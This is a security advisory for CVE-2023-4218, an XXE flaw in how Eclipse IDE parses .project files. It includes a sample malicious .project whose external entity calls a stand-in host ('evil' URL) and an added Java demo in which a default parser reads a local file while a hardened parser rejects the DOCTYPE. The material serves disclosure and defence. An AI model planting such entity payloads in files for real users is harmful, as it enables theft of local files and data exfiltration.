CVE-2023-4218 – org.eclipse.platform:org.eclipse.ui.ide
Package
Manager: maven
Name: org.eclipse.platform:org.eclipse.ui.ide
Vulnerable Version: >=0 <3.21.100
Severity
Level: Medium
CVSS v3.1: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
CVSS v4.0: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
EPSS: 0.00026 (percentile 0.0576)
Details
Eclipse IDE XXE in eclipse.platform

### Impact

XML files such as `.project` are parsed in a way that is vulnerable to all sorts of XXE attacks. The user only needs to open a malicious project, or update an already open project with a malicious file (for example when reviewing a foreign repository or patch). The vulnerability was found by static code analysis (SonarLint).

Example `.project` file:

```
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE price [ <!ENTITY xxe SYSTEM "http://127.0.0.1:49416/evil">]>
<projectDescription>
  <name>p</name>
  <comment>&xxe;</comment>
</projectDescription>
```

### Patches

Similar patches, including a JUnit test that shows the vulnerability, have already been applied to PDE (see https://github.com/eclipse-pde/eclipse.pde/pull/667). The solution for the platform should be the same: reject parsing any XML that contains a `DOCTYPE`.

### Workarounds

No known workaround. Users can only avoid getting or opening foreign files with Eclipse. Firewall rules can limit exfiltration of data over the network (but do not protect against an XML bomb).

### References

https://cwe.mitre.org/data/definitions/611.html
https://rules.sonarsource.com/java/RSPEC-2755
https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/8 (Report for multiple projects affected)
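The following is an added example, not code from the Eclipse platform or from the PDE patch referenced above. It shows the difference between a default JAXP `DocumentBuilderFactory` (which resolves the external entity in a `.project` file like the one in the advisory) and a factory configured the way the advisory recommends, rejecting any `DOCTYPE` before entities are declared. To run offline, the entity points at a temporary file created by the program instead of the `http://127.0.0.1:49416/evil` URL from the advisory; the class and method names (`ProjectFileXxeDemo`, `maliciousProject`, `vulnerableFactory`, `hardenedFactory`, `commentOf`) are assumptions for this demo.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

// Added demo class (not part of eclipse.platform): vulnerable vs hardened parsing
// of a .project file carrying an external entity.
public class ProjectFileXxeDemo {

    // Constructed .project document modelled on the advisory's example. The entity
    // targets a local file (assumption for an offline demo) instead of an HTTP URL.
    static String maliciousProject(Path secret) {
        return "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n"
             + "<!DOCTYPE price [ <!ENTITY xxe SYSTEM \"" + secret.toUri() + "\">]>\n"
             + "<projectDescription>\n"
             + "  <name>p</name>\n"
             + "  <comment>&xxe;</comment>\n"
             + "</projectDescription>\n";
    }

    // Default JAXP configuration: on a stock JDK this resolves external general
    // entities, so the file contents end up inside <comment>.
    static DocumentBuilderFactory vulnerableFactory() {
        return DocumentBuilderFactory.newInstance();
    }

    // Hardened configuration: the advisory's fix, "reject any XML that contains a
    // DOCTYPE", expressed as the Xerces/JDK disallow-doctype-decl feature. The parse
    // fails on the DOCTYPE itself, before any entity can be declared or expanded.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f;
    }

    // Parses the document with the given factory and returns the <comment> text.
    static String commentOf(DocumentBuilderFactory f, String xml) throws Exception {
        DocumentBuilder b = f.newDocumentBuilder();
        Document d = b.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        return d.getElementsByTagName("comment").item(0).getTextContent();
    }

    public static void main(String[] args) throws Exception {
        // Stand-in for a file on the victim's machine (constructed for the demo).
        Path secret = Files.createTempFile("xxe-demo", ".txt");
        Files.writeString(secret, "SECRET-FROM-LOCAL-FS");
        String xml = maliciousProject(secret);
        try {
            // Vulnerable path: the comment now contains the local file's contents.
            System.out.println("vulnerable parser read: " + commentOf(vulnerableFactory(), xml));

            // Hardened path: SAXParseException ("DOCTYPE is disallowed ...") is thrown
            // and nothing from the local file system is ever read.
            try {
                commentOf(hardenedFactory(), xml);
                System.out.println("hardened parser: unexpectedly parsed the document");
            } catch (SAXParseException e) {
                System.out.println("hardened parser rejected: " + e.getMessage());
            }
        } finally {
            Files.deleteIfExists(secret);
        }
    }
}
```

Compile and run with a JDK 11 or newer (`javac ProjectFileXxeDemo.java && java ProjectFileXxeDemo`). The vulnerable branch depends on the JDK's default JAXP settings allowing external entity resolution, which is the behaviour on stock JDKs at the time of the advisory; if a hardened JDK-wide XML configuration is in place, the first parse may already fail. Disabling DOCTYPE outright is the right choice for `.project` files because they never legitimately carry a DTD, which is why the advisory prefers it over merely switching off individual entity features.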
Metadata
Created: 2023-11-30T19:52:54Z
Modified: 2024-03-05T21:36:55Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-j24h-xcpc-9jw8/GHSA-j24h-xcpc-9jw8.json
CWE IDs: []
Alternative ID: GHSA-j24h-xcpc-9jw8
Finding: F083
Auto approve: 1